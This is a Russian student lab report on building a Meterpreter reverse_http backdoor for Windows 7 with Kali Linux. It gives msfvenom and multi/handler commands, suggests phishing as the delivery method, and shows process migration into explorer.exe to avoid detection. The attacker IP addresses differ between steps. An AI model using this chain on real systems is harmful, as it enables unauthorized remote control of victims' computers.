# Эксплуатация уязвимости
Автор: Князев Константин
Группа: БИСО-02-15

## Цель работы
Проэксплуатировать уязвимость операционной системы Windows с помощью средств Kali Linux.

## Введение
* **[Эксплойт][exploitWiki]** (англ. **exploit**, эксплуатировать) — компьютерная программа, фрагмент программного кода или последовательность команд, использующие уязвимости в программном обеспечении и применяемые для проведения атаки на вычислительную систему. Целью атаки может быть как захват контроля над системой (повышение привилегий), так и нарушение её функционирования (DoS-атака).

* **[Бэкдор][backdoorWiki]**, тайный вход (от англ. **back door** — «чёрный ход», буквально «задняя дверь») — дефект алгоритма, который намеренно встраивается в него разработчиком и позволяет получить несанкционированный доступ к данным или удалённому управлению операционной системой и компьютером в целом.

* **[Kali Linux][kaliWiki]** — GNU/Linux-LiveCD, возникший как результат слияния WHAX и Auditor Security Collection. Проект создали Мати Ахарони (Mati Aharoni) и Макс Мозер (Max Moser). Предназначен прежде всего для проведения тестов на безопасность. Наследник развивавшегося до 2013 года на базе Knoppix дистрибутива BackTrack. 

* **[Полезная нагрузка][payloadWiki]** (от англ. **payload** - полезная нагрузка)часть программного обеспечения, которая производит деструктивные действия с данными, копирование информации с заражённого компьютера и т. д.

* **[Meterpreter][meterpreterHabr]** - расширенная многофункциональная начинка (Payload), которая может быть динамически расширена во время выполнения. В нормальных условиях, это означает, что это обеспечивает Вас основной оболочкой и позволяет Вам добавлять новые особенности к ней по мере необходимости.

* **[Социальная инженерия][socEngWiki]** — совокупность приёмов, методов и технологий создания такого пространства, условий и обстоятельств, которые максимально эффективно приводят к конкретному необходимому результату, с использованием социологии и психологии.

* **[Фишинг][fishingWiki]** — одна из разновидностей социальной инженерии, основанная на незнании пользователями основ сетевой безопасности: в частности, многие не знают простого факта: сервисы не рассылают писем с просьбами сообщить свои учётные данные, пароль и прочее. 


За основу бэкдора возьмем полезную нагрузку от *meterpreter*, созданную с помощью средств Kali Linux, воспользуемся данным бэкдором для доступа в систему жертвы.


## Системные требования
* ОС: KaliLinux x64, Windows 7 x64
* Процессор: Intel Core i5
* RAM: 2+2Гб DDR3
* Более мощная конфигурация

## Этапы эксплуатации уязвимости
1. Генерация полезной нагрузки
2. Сборка бэкдора
3. Внедрение сформированного бэкдора в систему жертвы
4. Несанкционированный вход в систему жертвы

## Шаг № 1. Генерация полезной нагрузки

Запускаем систему Kali Linux и в терминале выполняем команду
>*ifconfig*

![][pic1]

Запоминаем наш *ip-адрес* (192.168.192.95) и переходим в приложение **MetasploitFramework**

![][pic2]

Выполняем следующую команду, указав наш *ip-адрес*
>*msfvenom -p windows/meterpreter/reverse_http host=192.168.5.133 port=8080 -s 363 -f raw -o ~/Desktop/http.bin*

Данная команда сгенерирует нам полезную нагрузку meterpreter и сохранит ее на рабочем столе Kali Linux

![][pic3]

## Шаг №2. Сборка бэкдора

Соберем пустую программу на языке C, которая будет иметь иденственную функцию Main, любыми доступными способами. После чего по адресу *0x400* поместим полезную нагрузку, сгенерированную на 1-ом шаге. В результате получим готовый для заражения бэкдор.

![][pic4]

## Шаг №3. Внедрение сформированного бэкдора в систему жертвы

Собранная на 2-ом шаге программа, является готовым необходимым нам бэкдором. Далее нам требуется внедрить этот бэкдор в систему жертвы, для этого можно воспользоваться множеством способов, одним из самых распространенных способом распространения подобного ПО является социальная инженерия, например с помощью рассылки фишинговых писем с вложенным или внедренным во вложенные документы вредоносным ПО.

## Шаг №4. Несанкционированный вход в систему жертвы

После нам необходимо запустить серверную часть приложения, которая будет ожидать от клиентской части meterpreter подключение к сессии. Для этого необходимо настроить сервер приложения meterpreter на Kali Linux в приложении MetasploitFramework следующими командами:

>*use exploit/multi/handler 
set payload windows/meterpreter/reverse_http
set lhost 192.168.192.64
set lport 8080
set exitfunc thread*

Проверим настройки командой:
>options

![][pic5]

После успешной настройки сервера запустим команду:
>run

Получаем сервер в режиме прослушивания,запущенный в соответствии с настроенными параметрами. Ожидаем на стороне жертвы запуска бэкдора, что установит [C&C][cncWiki] соединение с нашим сервером, после чего мы получим доступ в систему жертвы.

![][pic6]

Чтобы убедиться, что мы получили доступ к системе жертвы, мы можем, например, создать папку "Hackable" в корне диска C: зараженного компьютера.

![][pic7]
![][pic8]
![][pic9]


А также, встроить процесс нашего бэкдора в другой процесс, чтобы не вызвать лишних подозрений, а также обезопаситься от выхода из программы бэкдора на стороне жертвы. Для начала узнаем список всех запущенных процессов на компьютере жертвы:
>ps

![][pic10]

Найдем процесс с нашим бэкдором (*demo.exe*) и запомним его PID (*2220*). Выберем процесс, в который хотим встроить наш бэкдор, например *explorer.exe*. Запомним его PID (*2688*).
Далее, следующей командой, встроим бэкдор в легитимный процесс следующей командой:
>migrate 2220 -P 2688

![][pic11]

Для проверки успешности внедрения в систему, завершим процесс нашего бэкдора на стороне жертвы и создадим еще один каталог *Hackable2.0*

![][pic12]

В итоге мы получили несанкционированный доступ к чужой системе средствами Kali Linux.



[exploitWiki]: https://ru.wikipedia.org/wiki/%D0%AD%D0%BA%D1%81%D0%BF%D0%BB%D0%BE%D0%B9%D1%82
[backdoorWiki]: https://ru.wikipedia.org/wiki/%D0%91%D1%8D%D0%BA%D0%B4%D0%BE%D1%80
[kaliWiki]: https://ru.wikipedia.org/wiki/Kali_Linux
[payloadWiki]: https://en.wikipedia.org/wiki/Payload_(computing)
[meterpreterHabr]: https://habr.com/ru/post/131112/
[socEngWiki]: https://ru.wikipedia.org/wiki/%D0%A1%D0%BE%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D0%B0%D1%8F_%D0%B8%D0%BD%D0%B6%D0%B5%D0%BD%D0%B5%D1%80%D0%B8%D1%8F
[fishingWiki]: https://ru.wikipedia.org/wiki/%D0%A4%D0%B8%D1%88%D0%B8%D0%BD%D0%B3
[cncWiki]: https://en.wikipedia.org/wiki/Command_and_control

[pic1]: Files/pic1.png
[pic2]: Files/pic2.png
[pic3]: Files/pic3.png
[pic4]: Files/pic4.png
[pic5]: Files/pic5.png
[pic6]: Files/pic6.png
[pic7]: Files/pic7.png
[pic8]: Files/pic8.png
[pic9]: Files/pic9.png
[pic10]: Files/pic10.png
[pic11]: Files/pic11.png
[pic12]: Files/pic12.png